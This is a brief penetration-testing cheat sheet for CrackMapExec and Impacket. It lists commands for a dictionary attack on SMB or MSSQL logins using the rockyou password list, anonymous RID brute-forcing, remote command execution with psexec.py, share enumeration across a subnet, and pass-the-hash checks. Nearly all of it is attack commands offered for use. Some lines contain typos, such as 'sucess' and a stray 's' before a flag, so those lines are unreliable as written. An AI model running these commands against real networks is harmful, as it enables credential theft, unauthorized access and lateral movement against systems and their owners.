Crackmapexec

Dictionary attack against SMB

cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute

Brute force attack using an anonymous user

cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000

Use the password with impacket/examples/psexec.py in the following way

psexec.py domain.name/<user>:<password>@<target-IP>

Check user permissions on shares

crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares

Check user hash on the network via smb

 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>